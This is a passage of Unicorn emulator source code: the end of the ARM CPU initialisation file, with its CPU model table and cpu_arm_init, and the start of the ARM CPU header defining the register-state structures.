1, t); FIELD_DP32(t, ID_ISAR6, SPECRES, 1, t); cpu->isar.id_isar6 = t; t = cpu->isar.mvfr1; FIELD_DP32(t, MVFR1, FPHP, 2, t); /* v8.0 FP support */ cpu->isar.mvfr1 = t; t = cpu->isar.mvfr2; FIELD_DP32(t, MVFR2, SIMDMISC, 3, t); /* SIMD MaxNum */ FIELD_DP32(t, MVFR2, FPMISC, 4, t); /* FP MaxNum */ cpu->isar.mvfr2 = t; t = cpu->isar.id_mmfr3; FIELD_DP32(t, ID_MMFR3, PAN, 2, t); /* ATS1E1 */ cpu->isar.id_mmfr3 = t; t = cpu->isar.id_mmfr4; FIELD_DP32(t, ID_MMFR4, HPDS, 1, t); /* AA32HPD */ FIELD_DP32(t, ID_MMFR4, AC2, 1, t); /* ACTLR2, HACTLR2 */ FIELD_DP32(t, ID_MMFR4, CNP, 1, t); /* TTCNP */ cpu->isar.id_mmfr4 = t; } //#endif } } #endif #endif /* !defined(TARGET_AARCH64) */ struct ARMCPUInfo { const char *name; void (*initfn)(struct uc_struct *uc, CPUState *obj); void (*class_init)(struct uc_struct *uc, CPUClass *oc, void *data); }; #if !defined(TARGET_AARCH64) static struct ARMCPUInfo arm_cpus[] = { { "arm926", arm926_initfn }, { "arm946", arm946_initfn }, { "arm1026", arm1026_initfn }, /* What QEMU calls "arm1136-r2" is actually the 1136 r0p2, i.e. an * older core than plain "arm1136". In particular this does not * have the v6K features. 
*/ { "arm1136-r2", arm1136_r2_initfn }, { "arm1136", arm1136_initfn }, { "arm1176", arm1176_initfn }, { "arm11mpcore", arm11mpcore_initfn }, { "cortex-m0", cortex_m0_initfn, arm_v7m_class_init }, { "cortex-m3", cortex_m3_initfn, arm_v7m_class_init }, { "cortex-m4", cortex_m4_initfn, arm_v7m_class_init }, { "cortex-m7", cortex_m7_initfn, arm_v7m_class_init }, { "cortex-m33", cortex_m33_initfn, arm_v7m_class_init }, { "cortex-r5", cortex_r5_initfn }, { "cortex-r5f", cortex_r5f_initfn }, { "cortex-a7", cortex_a7_initfn }, { "cortex-a8", cortex_a8_initfn }, { "cortex-a9", cortex_a9_initfn }, { "cortex-a15", cortex_a15_initfn }, { "ti925t", ti925t_initfn }, { "sa1100", sa1100_initfn }, { "sa1110", sa1110_initfn }, { "pxa250", pxa250_initfn }, { "pxa255", pxa255_initfn }, { "pxa260", pxa260_initfn }, { "pxa261", pxa261_initfn }, { "pxa262", pxa262_initfn }, /* "pxa270" is an alias for "pxa270-a0" */ { "pxa270", pxa270a0_initfn }, { "pxa270-a0", pxa270a0_initfn }, { "pxa270-a1", pxa270a1_initfn }, { "pxa270-b0", pxa270b0_initfn }, { "pxa270-b1", pxa270b1_initfn }, { "pxa270-c0", pxa270c0_initfn }, { "pxa270-c5", pxa270c5_initfn }, { "max", arm_max_initfn }, }; #endif void arm_cpu_class_init(struct uc_struct *uc, CPUClass *oc) { ARMCPUClass *acc = ARM_CPU_CLASS(oc); CPUClass *cc = CPU_CLASS(acc); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ acc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: arm_cpu_reset(). */ cc->reset = arm_cpu_reset; cc->has_work = arm_cpu_has_work; cc->cpu_exec_interrupt = arm_cpu_exec_interrupt; cc->set_pc = arm_cpu_set_pc; cc->synchronize_from_tb = arm_cpu_synchronize_from_tb; cc->do_interrupt = arm_cpu_do_interrupt; cc->get_phys_page_attrs_debug = arm_cpu_get_phys_page_attrs_debug; cc->asidx_from_attrs = arm_asidx_from_attrs; cc->tcg_initialize = arm_translate_init; cc->tlb_fill_cpu = arm_cpu_tlb_fill; cc->debug_excp_handler = arm_debug_excp_handler; cc->do_unaligned_access = arm_cpu_do_unaligned_access; } static void arm_cpu_instance_init(CPUState *obj) { #if 0 ARMCPUClass *acc = ARM_CPU_GET_CLASS(obj); acc->info->initfn(obj); #endif arm_cpu_post_init(obj); } ARMCPU *cpu_arm_init(struct uc_struct *uc) { ARMCPU *cpu; CPUState *cs; CPUClass *cc; CPUARMState *env; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } #if !defined(TARGET_AARCH64) if (uc->mode & UC_MODE_MCLASS) { uc->cpu_model = UC_CPU_ARM_CORTEX_M33; } else if (uc->mode & UC_MODE_ARM926) { uc->cpu_model = UC_CPU_ARM_926; } else if (uc->mode & UC_MODE_ARM946) { uc->cpu_model = UC_CPU_ARM_946; } else if (uc->mode & UC_MODE_ARM1176) { uc->cpu_model = UC_CPU_ARM_1176; } else if (uc->cpu_model == INT_MAX) { if (uc->mode & UC_MODE_BIG_ENDIAN) { uc->cpu_model = UC_CPU_ARM_1176; // For BE32 mode. 
        } else {
            uc->cpu_model = UC_CPU_ARM_CORTEX_A15; // cortex-a15
        }
    } else if (uc->cpu_model >= ARR_SIZE(arm_cpus)) {
        free(cpu);
        return NULL;
    }
#endif

    cs = (CPUState *)cpu;
    cc = (CPUClass *)&cpu->cc;
    cs->cc = cc;
    cs->uc = uc;
    uc->cpu = (CPUState *)cpu;

    /* init CPUClass */
    cpu_class_init(uc, cc);
    /* init ARMCPUClass */
    arm_cpu_class_init(uc, cc);
    /* init CPUState */
    cpu_common_initfn(uc, cs);
    /* init ARMCPU */
    arm_cpu_initfn(uc, cs);

#if !defined(TARGET_AARCH64)
    /* init ARM types */
    if (arm_cpus[uc->cpu_model].class_init) {
        arm_cpus[uc->cpu_model].class_init(uc, cc, uc);
    }
    if (arm_cpus[uc->cpu_model].initfn) {
        arm_cpus[uc->cpu_model].initfn(uc, cs);
    }
#endif

    /* postinit ARMCPU */
    arm_cpu_instance_init(cs);

    /* realize ARMCPU */
    arm_cpu_realizefn(uc, cs);

    // init address space
    cpu_address_space_init(cs, 0, cs->memory);

    qemu_init_vcpu(cs);

    // UC_MODE_BIG_ENDIAN means big endian code and big endian data (BE32), which
    // is only supported before ARMv7-A (and it only makes sense in qemu usermode!).
    //
    // In fact there shouldn't be any difference between UC_MODE_ARMBE8 and BE32;
    // we keep the distinction for backward compatibility.
    //
    // UC_MODE_ARMBE8                      -> little endian code, big endian data
    // UC_MODE_ARMBE8 | UC_MODE_BIG_ENDIAN -> big endian code, big endian data
    //
    // In QEMU system mode, all arm instruction fetches **should be** little
    // endian; however, we hack it to support (usermode) BE32.
    //
    // Reference:
    // https://developer.arm.com/documentation/ddi0406/c/Application-Level-Architecture/Application-Level-Memory-Model/Endian-support/Instruction-endianness?lang=en
    // https://developer.arm.com/documentation/den0024/a/ARMv8-Registers/Endianness
    env = &cpu->env;
    if (uc->mode & UC_MODE_ARMBE8 || uc->mode & UC_MODE_BIG_ENDIAN) {
        // Big endian data access.
        env->uncached_cpsr |= CPSR_E;
    }

    if (uc->mode & UC_MODE_BIG_ENDIAN) {
        // Big endian code access.
        env->cp15.sctlr_ns |= SCTLR_B;
    }

    // Backward compatibility: start the arm CPU in non-secure state.
    env->cp15.scr_el3 |= SCR_NS;

    arm_rebuild_hflags(env);

    return cpu;
}
unicorn-2.1.1/qemu/target/arm/cpu.h
/*
 * ARM virtual CPU header
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef ARM_CPU_H
#define ARM_CPU_H

#include "hw/registerfields.h"
#include "cpu-qom.h"
#include "exec/cpu-defs.h"

struct uc_struct;

/* ARM processors have a weak memory model */
#define TCG_GUEST_DEFAULT_MO (0)

#define EXCP_UDEF            1   /* undefined instruction */
#define EXCP_SWI             2   /* software interrupt */
#define EXCP_PREFETCH_ABORT  3
#define EXCP_DATA_ABORT      4
#define EXCP_IRQ             5
#define EXCP_FIQ             6
#define EXCP_BKPT            7
#define EXCP_EXCEPTION_EXIT  8   /* Return from v7M exception. */
#define EXCP_KERNEL_TRAP     9   /* Jumped to kernel code page. */
#define EXCP_HVC            11   /* HyperVisor Call */
#define EXCP_HYP_TRAP       12
#define EXCP_SMC            13   /* Secure Monitor Call */
#define EXCP_VIRQ           14
#define EXCP_VFIQ           15
#define EXCP_SEMIHOST       16   /* semihosting call */
#define EXCP_NOCP           17   /* v7M NOCP UsageFault */
#define EXCP_INVSTATE       18   /* v7M INVSTATE UsageFault */
#define EXCP_STKOF          19   /* v8M STKOF UsageFault */
#define EXCP_LAZYFP         20   /* v7M fault during lazy FP stacking */
#define EXCP_LSERR          21   /* v8M LSERR SecureFault */
#define EXCP_UNALIGNED      22   /* v7M UNALIGNED UsageFault */
/* NB: add new EXCP_ defines to the array in arm_log_exception() too */

#define ARMV7M_EXCP_RESET    1
#define ARMV7M_EXCP_NMI      2
#define ARMV7M_EXCP_HARD     3
#define ARMV7M_EXCP_MEM      4
#define ARMV7M_EXCP_BUS      5
#define ARMV7M_EXCP_USAGE    6
#define ARMV7M_EXCP_SECURE   7
#define ARMV7M_EXCP_SVC     11
#define ARMV7M_EXCP_DEBUG   12
#define ARMV7M_EXCP_PENDSV  14
#define ARMV7M_EXCP_SYSTICK 15

/* For M profile, some registers are banked secure vs non-secure;
 * these are represented as a 2-element array where the first element
 * is the non-secure copy and the second is the secure copy.
 * When the CPU does not implement the security extension then
 * only the first element is used.
 * This means that the copy for the current security state can be
 * accessed via env->registerfield[env->v7m.secure] (whether the security
 * extension is implemented or not).
 */
enum {
    M_REG_NS = 0,
    M_REG_S = 1,
    M_REG_NUM_BANKS = 2,
};

/* ARM-specific interrupt pending bits. */
#define CPU_INTERRUPT_FIQ  CPU_INTERRUPT_TGT_EXT_1
#define CPU_INTERRUPT_VIRQ CPU_INTERRUPT_TGT_EXT_2
#define CPU_INTERRUPT_VFIQ CPU_INTERRUPT_TGT_EXT_3

/* The usual mapping for an AArch64 system register to its AArch32
 * counterpart is for the 32 bit world to have access to the lower
 * half only (with writes leaving the upper half untouched). It's
 * therefore useful to be able to pass TCG the offset of the least
 * significant half of a uint64_t struct member.
 */
#ifdef HOST_WORDS_BIGENDIAN
#define offsetoflow32(S, M) (offsetof(S, M) + sizeof(uint32_t))
#define offsetofhigh32(S, M) offsetof(S, M)
#else
#define offsetoflow32(S, M) offsetof(S, M)
#define offsetofhigh32(S, M) (offsetof(S, M) + sizeof(uint32_t))
#endif

/* Meanings of the ARMCPU object's four inbound GPIO lines */
#define ARM_CPU_IRQ 0
#define ARM_CPU_FIQ 1
#define ARM_CPU_VIRQ 2
#define ARM_CPU_VFIQ 3

/* ARM-specific extra insn start words:
 * 1: Conditional execution bits
 * 2: Partial exception syndrome for data aborts
 */
#define TARGET_INSN_START_EXTRA_WORDS 2

/* The 2nd extra word holding syndrome info for data aborts does not use
 * the upper 6 bits nor the lower 14 bits. We mask and shift it down to
 * help the sleb128 encoder do a better job.
 * When restoring the CPU state, we shift it back up.
 */
#define ARM_INSN_START_WORD2_MASK ((1 << 26) - 1)
#define ARM_INSN_START_WORD2_SHIFT 14

/* We currently assume float and double are IEEE single and double
   precision respectively.
Doing runtime conversions is tricky because VFP registers may contain integer values (eg. as the result of a FTOSI instruction). s<2n> maps to the least significant half of d<n> s<2n+1> maps to the most significant half of d<n> */ /* CPU state for each instance of a generic timer (in cp15 c14) */ typedef struct ARMGenericTimer { uint64_t cval; /* Timer CompareValue register */ uint64_t ctl; /* Timer Control register */ } ARMGenericTimer; #define GTIMER_PHYS 0 #define GTIMER_VIRT 1 #define GTIMER_HYP 2 #define GTIMER_SEC 3 #define GTIMER_HYPVIRT 4 #define NUM_GTIMERS 5 typedef struct { uint64_t raw_tcr; uint32_t mask; uint32_t base_mask; } TCR; /* Define a maximum sized vector register. * For 32-bit, this is a 128-bit NEON/AdvSIMD register. * For 64-bit, this is a 2048-bit SVE register. * * Note that the mapping between S, D, and Q views of the register bank * differs between AArch64 and AArch32. * In AArch32: * Qn = regs[n].d[1]:regs[n].d[0] * Dn = regs[n / 2].d[n & 1] * Sn = regs[n / 4].d[n % 4 / 2], * bits 31..0 for even n, and bits 63..32 for odd n * (and regs[16] to regs[31] are inaccessible) * In AArch64: * Zn = regs[n].d[*] * Qn = regs[n].d[1]:regs[n].d[0] * Dn = regs[n].d[0] * Sn = regs[n].d[0] bits 31..0 * Hn = regs[n].d[0] bits 15..0 * * This corresponds to the architecturally defined mapping between * the two execution states, and means we do not need to explicitly * map these registers when changing states. * * Align the data for use with TCG host vector operations. */ #ifdef TARGET_AARCH64 # define ARM_MAX_VQ 16 //void arm_cpu_sve_finalize(ARMCPU *cpu); #else # define ARM_MAX_VQ 1 //static inline void arm_cpu_sve_finalize(ARMCPU *cpu) { } #endif typedef struct ARMVectorReg { uint64_t d[2 * ARM_MAX_VQ] QEMU_ALIGNED(16); } ARMVectorReg; #ifdef TARGET_AARCH64 /* In AArch32 mode, predicate registers do not exist at all. */ typedef struct ARMPredicateReg { uint64_t p[DIV_ROUND_UP(2 * ARM_MAX_VQ, 8)] QEMU_ALIGNED(16); } ARMPredicateReg; /* In AArch32 mode, PAC keys do not exist at all. */ typedef struct ARMPACKey { uint64_t lo, hi; } ARMPACKey; #endif typedef struct CPUARMState { /* Regs for current mode. */ uint32_t regs[16]; /* 32/64 switch only happens when taking and returning from * exceptions so the overlap semantics are taken care of then * instead of having a complicated union. */ /* Regs for A64 mode. */ uint64_t xregs[32]; uint64_t pc; /* PSTATE isn't an architectural register for ARMv8. However, it is * convenient for us to assemble the underlying state into a 32 bit format * identical to the architectural format used for the SPSR. (This is also * what the Linux kernel's 'pstate' field in signal handlers and KVM's * 'pstate' register are.) Of the PSTATE bits: * NZCV are kept in the split out env->CF/VF/NF/ZF, (which have the same * semantics as for AArch32, as described in the comments on each field) * nRW (also known as M[4]) is kept, inverted, in env->aarch64 * DAIF (exception masks) are kept in env->daif * BTYPE is kept in env->btype * all other bits are stored in their correct places in env->pstate */ uint32_t pstate; uint32_t aarch64; /* 1 if CPU is in aarch64 state; inverse of PSTATE.nRW */ /* Cached TBFLAGS state. See below for which bits are included. */ uint32_t hflags; /* Frequently accessed CPSR bits are stored separately for efficiency. This contains all the other bits. Use cpsr_{read,write} to access the whole CPSR. */ uint32_t uncached_cpsr; uint32_t spsr; /* Banked registers. 
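 * (One slot per CPU mode bank; QEMU maps modes to indices via
 * bank_number() -- usr/sys share index 0, fiq is index 5 -- and the
 * fiq-banked copies of r8-r12 live in fiq_regs[] below.)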
*/ uint64_t banked_spsr[8]; uint32_t banked_r13[8]; uint32_t banked_r14[8]; /* These hold r8-r12. */ uint32_t usr_regs[5]; uint32_t fiq_regs[5]; /* cpsr flag cache for faster execution */ uint32_t CF; /* 0 or 1 */ uint32_t VF; /* V is the bit 31. All other bits are undefined */ uint32_t NF; /* N is bit 31. All other bits are undefined. */ uint32_t ZF; /* Z set if zero. */ uint32_t QF; /* 0 or 1 */ uint32_t GE; /* cpsr[19:16] */ uint32_t thumb; /* cpsr[5]. 0 = arm mode, 1 = thumb mode. */ uint32_t condexec_bits; /* IT bits. cpsr[15:10,26:25]. */ uint32_t btype; /* BTI branch type. spsr[11:10]. */ uint64_t daif; /* exception masks, in the bits they are in PSTATE */ uint64_t elr_el[4]; /* AArch64 exception link regs */ uint64_t sp_el[4]; /* AArch64 banked stack pointers */ /* System control coprocessor (cp15) */ struct { uint32_t c0_cpuid; union { /* Cache size selection */ struct { uint64_t _unused_csselr0; uint64_t csselr_ns; uint64_t _unused_csselr1; uint64_t csselr_s; }; uint64_t csselr_el[4]; }; union { /* System control register. */ struct { uint64_t _unused_sctlr; uint64_t sctlr_ns; uint64_t hsctlr; uint64_t sctlr_s; }; uint64_t sctlr_el[4]; }; uint64_t cpacr_el1; /* Architectural feature access control register */ uint64_t cptr_el[4]; /* ARMv8 feature trap registers */ uint32_t c1_xscaleauxcr; /* XScale auxiliary control register. */ uint64_t sder; /* Secure debug enable register. */ uint32_t nsacr; /* Non-secure access control register. */ union { /* MMU translation table base 0. */ struct { uint64_t _unused_ttbr0_0; uint64_t ttbr0_ns; uint64_t _unused_ttbr0_1; uint64_t ttbr0_s; }; uint64_t ttbr0_el[4]; }; union { /* MMU translation table base 1. */ struct { uint64_t _unused_ttbr1_0; uint64_t ttbr1_ns; uint64_t _unused_ttbr1_1; uint64_t ttbr1_s; }; uint64_t ttbr1_el[4]; }; uint64_t vttbr_el2; /* Virtualization Translation Table Base. */ /* MMU translation table base control. */ TCR tcr_el[4]; TCR vtcr_el2; /* Virtualization Translation Control. */ uint32_t c2_data; /* MPU data cacheable bits. */ uint32_t c2_insn; /* MPU instruction cacheable bits. */ union { /* MMU domain access control register * MPU write buffer control. */ struct { uint64_t dacr_ns; uint64_t dacr_s; }; struct { uint64_t dacr32_el2; }; }; uint32_t pmsav5_data_ap; /* PMSAv5 MPU data access permissions */ uint32_t pmsav5_insn_ap; /* PMSAv5 MPU insn access permissions */ uint64_t hcr_el2; /* Hypervisor configuration register */ uint64_t scr_el3; /* Secure configuration register. */ union { /* Fault status registers. */ struct { uint64_t ifsr_ns; uint64_t ifsr_s; }; struct { uint64_t ifsr32_el2; }; }; union { struct { uint64_t _unused_dfsr; uint64_t dfsr_ns; uint64_t hsr; uint64_t dfsr_s; }; uint64_t esr_el[4]; }; uint32_t c6_region[8]; /* MPU base/size registers. */ union { /* Fault address registers. */ struct { uint64_t _unused_far0; #ifdef HOST_WORDS_BIGENDIAN uint32_t ifar_ns; uint32_t dfar_ns; uint32_t ifar_s; uint32_t dfar_s; #else uint32_t dfar_ns; uint32_t ifar_ns; uint32_t dfar_s; uint32_t ifar_s; #endif uint64_t _unused_far3; }; uint64_t far_el[4]; }; uint64_t hpfar_el2; uint64_t hstr_el2; union { /* Translation result. */ struct { uint64_t _unused_par_0; uint64_t par_ns; uint64_t _unused_par_1; uint64_t par_s; }; uint64_t par_el[4]; }; uint32_t c9_insn; /* Cache lockdown registers. 
*/ uint32_t c9_data; uint64_t c9_pmcr; /* performance monitor control register */ uint64_t c9_pmcnten; /* perf monitor counter enables */ uint64_t c9_pmovsr; /* perf monitor overflow status */ uint64_t c9_pmuserenr; /* perf monitor user enable */ uint64_t c9_pmselr; /* perf monitor counter selection register */ uint64_t c9_pminten; /* perf monitor interrupt enables */ union { /* Memory attribute redirection */ struct { #ifdef HOST_WORDS_BIGENDIAN uint64_t _unused_mair_0; uint32_t mair1_ns; uint32_t mair0_ns; uint64_t _unused_mair_1; uint32_t mair1_s; uint32_t mair0_s; #else uint64_t _unused_mair_0; uint32_t mair0_ns; uint32_t mair1_ns; uint64_t _unused_mair_1; uint32_t mair0_s; uint32_t mair1_s; #endif }; uint64_t mair_el[4]; }; union { /* vector base address register */ struct { uint64_t _unused_vbar; uint64_t vbar_ns; uint64_t hvbar; uint64_t vbar_s; }; uint64_t vbar_el[4]; }; uint32_t mvbar; /* (monitor) vector base address register */ struct { /* FCSE PID. */ uint32_t fcseidr_ns; uint32_t fcseidr_s; }; union { /* Context ID. */ struct { uint64_t _unused_contextidr_0; uint64_t contextidr_ns; uint64_t _unused_contextidr_1; uint64_t contextidr_s; }; uint64_t contextidr_el[4]; }; union { /* User RW Thread register. */ struct { uint64_t tpidrurw_ns; uint64_t tpidrprw_ns; uint64_t htpidr; uint64_t _tpidr_el3; }; uint64_t tpidr_el[4]; }; /* The secure banks of these registers don't map anywhere */ uint64_t tpidrurw_s; uint64_t tpidrprw_s; uint64_t tpidruro_s; union { /* User RO Thread register. */ uint64_t tpidruro_ns; uint64_t tpidrro_el[1]; }; uint64_t c14_cntfrq; /* Counter Frequency register */ uint64_t c14_cntkctl; /* Timer Control register */ uint32_t cnthctl_el2; /* Counter/Timer Hyp Control register */ uint64_t cntvoff_el2; /* Counter Virtual Offset register */ ARMGenericTimer c14_timer[NUM_GTIMERS]; uint32_t c15_cpar; /* XScale Coprocessor Access Register */ uint32_t c15_ticonfig; /* TI925T configuration byte. */ uint32_t c15_i_max; /* Maximum D-cache dirty line index. */ uint32_t c15_i_min; /* Minimum D-cache dirty line index. */ uint32_t c15_threadid; /* TI debugger thread-ID. */ uint32_t c15_config_base_address; /* SCU base address. */ uint32_t c15_diagnostic; /* diagnostic register */ uint32_t c15_power_diagnostic; uint32_t c15_power_control; /* power control */ uint64_t dbgbvr[16]; /* breakpoint value registers */ uint64_t dbgbcr[16]; /* breakpoint control registers */ uint64_t dbgwvr[16]; /* watchpoint value registers */ uint64_t dbgwcr[16]; /* watchpoint control registers */ uint64_t mdscr_el1; uint64_t oslsr_el1; /* OS Lock Status */ uint64_t mdcr_el2; uint64_t mdcr_el3; /* Stores the architectural value of the counter *the last time it was * updated* by pmccntr_op_start. Accesses should always be surrounded * by pmccntr_op_start/pmccntr_op_finish to guarantee the latest * architecturally-correct value is being read/set. */ uint64_t c15_ccnt; /* Stores the delta between the architectural value and the underlying * cycle count during normal operation. It is used to update c15_ccnt * to be the correct architectural value before accesses. During * accesses, c15_ccnt_delta contains the underlying count being used * for the access, after which it reverts to the delta value in * pmccntr_op_finish. 
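 * In short: while the counter runs, the guest-visible value is
 * (underlying count - c15_ccnt_delta); the pmccntr_op_start() /
 * pmccntr_op_finish() pair converts between the two representations.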
*/ uint64_t c15_ccnt_delta; uint64_t c14_pmevcntr[31]; uint64_t c14_pmevcntr_delta[31]; uint64_t c14_pmevtyper[31]; uint64_t pmccfiltr_el0; /* Performance Monitor Filter Register */ uint64_t vpidr_el2; /* Virtualization Processor ID Register */ uint64_t vmpidr_el2; /* Virtualization Multiprocessor ID Register */ } cp15; struct { /* M profile has up to 4 stack pointers: * a Main Stack Pointer and a Process Stack Pointer for each * of the Secure and Non-Secure states. (If the CPU doesn't support * the security extension then it has only two SPs.) * In QEMU we always store the currently active SP in regs[13], * and the non-active SP for the current security state in * v7m.other_sp. The stack pointers for the inactive security state * are stored in other_ss_msp and other_ss_psp. * switch_v7m_security_state() is responsible for rearranging them * when we change security state. */ uint32_t other_sp; uint32_t other_ss_msp; uint32_t other_ss_psp; uint32_t vecbase[M_REG_NUM_BANKS]; uint32_t basepri[M_REG_NUM_BANKS]; uint32_t control[M_REG_NUM_BANKS]; uint32_t ccr[M_REG_NUM_BANKS]; /* Configuration and Control */ uint32_t cfsr[M_REG_NUM_BANKS]; /* Configurable Fault Status */ uint32_t hfsr; /* HardFault Status */ uint32_t dfsr; /* Debug Fault Status Register */ uint32_t sfsr; /* Secure Fault Status Register */ uint32_t mmfar[M_REG_NUM_BANKS]; /* MemManage Fault Address */ uint32_t bfar; /* BusFault Address */ uint32_t sfar; /* Secure Fault Address Register */ unsigned mpu_ctrl[M_REG_NUM_BANKS]; /* MPU_CTRL */ int exception; uint32_t primask[M_REG_NUM_BANKS]; uint32_t faultmask[M_REG_NUM_BANKS]; uint32_t aircr; /* only holds r/w state if security extn implemented */ uint32_t secure; /* Is CPU in Secure state? (not guest visible) */ uint32_t csselr[M_REG_NUM_BANKS]; uint32_t scr[M_REG_NUM_BANKS]; uint32_t msplim[M_REG_NUM_BANKS]; uint32_t psplim[M_REG_NUM_BANKS]; uint32_t fpcar[M_REG_NUM_BANKS]; uint32_t fpccr[M_REG_NUM_BANKS]; uint32_t fpdscr[M_REG_NUM_BANKS]; uint32_t cpacr[M_REG_NUM_BANKS]; uint32_t nsacr; } v7m; /* Information associated with an exception about to be taken: * code which raises an exception must set cs->exception_index and * the relevant parts of this structure; the cpu_do_interrupt function * will then set the guest-visible registers as part of the exception * entry process. */ struct { uint32_t syndrome; /* AArch64 format syndrome register */ uint32_t fsr; /* AArch32 format fault status register info */ uint64_t vaddress; /* virtual addr associated with exception, if any */ uint32_t target_el; /* EL the exception should be targeted for */ /* If we implement EL2 we will also need to store information * about the intermediate physical address for stage 2 faults. */ } exception; /* Information associated with an SError */ struct { uint8_t pending; uint8_t has_esr; uint64_t esr; } serror; /* State of our input IRQ/FIQ/VIRQ/VFIQ lines */ uint32_t irq_line_state; /* Thumb-2 EE state. */ uint32_t teecr; uint32_t teehbr; /* VFP coprocessor state. */ struct { ARMVectorReg zregs[32]; #ifdef TARGET_AARCH64 /* Store FFR as pregs[16] to make it easier to treat as any other. */ #define FFR_PRED_NUM 16 ARMPredicateReg pregs[17]; /* Scratch space for aa64 sve predicate temporary. */ ARMPredicateReg preg_tmp; #endif /* We store these fpcsr fields separately for convenience. */ uint32_t qc[4] QEMU_ALIGNED(16); int vec_len; int vec_stride; uint32_t xregs[16]; /* Scratch space for aa32 neon expansion. 
*/ uint32_t scratch[8]; /* There are a number of distinct float control structures: * * fp_status: is the "normal" fp status. * fp_status_fp16: used for half-precision calculations * standard_fp_status : the ARM "Standard FPSCR Value" * * Half-precision operations are governed by a separate * flush-to-zero control bit in FPSCR:FZ16. We pass a separate * status structure to control this. * * The "Standard FPSCR", ie default-NaN, flush-to-zero, * round-to-nearest and is used by any operations (generally * Neon) which the architecture defines as controlled by the * standard FPSCR value rather than the FPSCR. * * To avoid having to transfer exception bits around, we simply * say that the FPSCR cumulative exception flags are the logical * OR of the flags in the three fp statuses. This relies on the * only thing which needs to read the exception flags being * an explicit FPSCR read. */ float_status fp_status; float_status fp_status_f16; float_status standard_fp_status; /* ZCR_EL[1-3] */ uint64_t zcr_el[4]; } vfp; uint64_t exclusive_addr; uint64_t exclusive_val; uint64_t exclusive_high; /* iwMMXt coprocessor state. */ struct { uint64_t regs[16]; uint64_t val; uint32_t cregs[16]; } iwmmxt; #ifdef TARGET_AARCH64 struct { ARMPACKey apia; ARMPACKey apib; ARMPACKey apda; ARMPACKey apdb; ARMPACKey apga; } keys; #endif /* Fields up to this point are cleared by a CPU reset */ #ifndef _MSC_VER struct {} end_reset_fields; #else int end_reset_fields; #endif /* Fields after this point are preserved across CPU reset. */ /* Internal CPU feature flags. */ uint64_t features; /* PMSAv7 MPU */ struct { uint32_t *drbar; uint32_t *drsr; uint32_t *dracr; uint32_t rnr[M_REG_NUM_BANKS]; } pmsav7; /* PMSAv8 MPU */ struct { /* The PMSAv8 implementation also shares some PMSAv7 config * and state: * pmsav7.rnr (region number register) * pmsav7_dregion (number of configured regions) */ uint32_t *rbar[M_REG_NUM_BANKS]; uint32_t *rlar[M_REG_NUM_BANKS]; uint32_t mair0[M_REG_NUM_BANKS]; uint32_t mair1[M_REG_NUM_BANKS]; } pmsav8; /* v8M SAU */ struct { uint32_t *rbar; uint32_t *rlar; uint32_t rnr; uint32_t ctrl; } sau; void *nvic; const struct arm_boot_info *boot_info; /* Store GICv3CPUState to access from this struct */ void *gicv3state; struct CPUBreakpoint *cpu_breakpoint[16]; struct CPUWatchpoint *cpu_watchpoint[16]; // Unicorn engine struct uc_struct *uc; } CPUARMState; /** * ARMELChangeHookFn: * type of a function which can be registered via arm_register_el_change_hook() * to get callbacks when the CPU changes its exception level or mode. */ typedef void ARMELChangeHookFn(ARMCPU *cpu, void *opaque); typedef struct ARMELChangeHook ARMELChangeHook; struct ARMELChangeHook { ARMELChangeHookFn *hook; void *opaque; QLIST_ENTRY(ARMELChangeHook) node; }; /* These values map onto the return values for * QEMU_PSCI_0_2_FN_AFFINITY_INFO */ typedef enum ARMPSCIState { PSCI_ON = 0, PSCI_OFF = 1, PSCI_ON_PENDING = 2 } ARMPSCIState; typedef struct ARMISARegisters ARMISARegisters; /** * ARMCPU: * @env: #CPUARMState * * An ARM CPU core. */ struct ARMCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUARMState env; /* Coprocessor information */ GHashTable *cp_regs; /* For marshalling (mostly coprocessor) register state between the * kernel and QEMU (for KVM) and between two QEMUs (for migration), * we use these arrays. 
*/ /* List of register indexes managed via these arrays; (full KVM style * 64 bit indexes, not CPRegInfo 32 bit indexes) */ uint64_t *cpreg_indexes; /* Values of the registers (cpreg_indexes[i]'s value is cpreg_values[i]) */ uint64_t *cpreg_values; /* Length of the indexes, values, reset_values arrays */ int32_t cpreg_array_len; /* These are used only for migration: incoming data arrives in * these fields and is sanity checked in post_load before copying * to the working data structures above. */ uint64_t *cpreg_vmstate_indexes; uint64_t *cpreg_vmstate_values; int32_t cpreg_vmstate_array_len; /* Timers used by the generic (architected) timer */ // QEMUTimer *gt_timer[NUM_GTIMERS]; /* * Timer used by the PMU. Its state is restored after migration by * pmu_op_finish() - it does not need other handling during migration */ // QEMUTimer *pmu_timer; /* GPIO outputs for generic timer */ //qemu_irq gt_timer_outputs[NUM_GTIMERS]; /* GPIO output for GICv3 maintenance interrupt signal */ //qemu_irq gicv3_maintenance_interrupt; /* GPIO output for the PMU interrupt */ //qemu_irq pmu_interrupt; /* MemoryRegion to use for secure physical accesses */ MemoryRegion *secure_memory; /* For v8M, pointer to the IDAU interface provided by board/SoC */ void *idau; /* PSCI version for this CPU * Bits[31:16] = Major Version * Bits[15:0] = Minor Version */ uint32_t psci_version; /* Should CPU start in PSCI powered-off state? */ bool start_powered_off; /* Current power state, access guarded by BQL */ ARMPSCIState power_state; /* CPU has virtualization extension */ bool has_el2; /* CPU has security extension */ bool has_el3; /* CPU has PMU (Performance Monitor Unit) */ bool has_pmu; /* CPU has VFP */ bool has_vfp; /* CPU has Neon */ bool has_neon; /* CPU has M-profile DSP extension */ bool has_dsp; /* CPU has memory protection unit */ bool has_mpu; /* PMSAv7 MPU number of supported regions */ uint32_t pmsav7_dregion; /* v8M SAU number of supported regions */ uint32_t sau_sregion; /* PSCI conduit used to invoke PSCI methods * 0 - disabled, 1 - smc, 2 - hvc */ uint32_t psci_conduit; /* For v8M, initial value of the Secure VTOR */ uint32_t 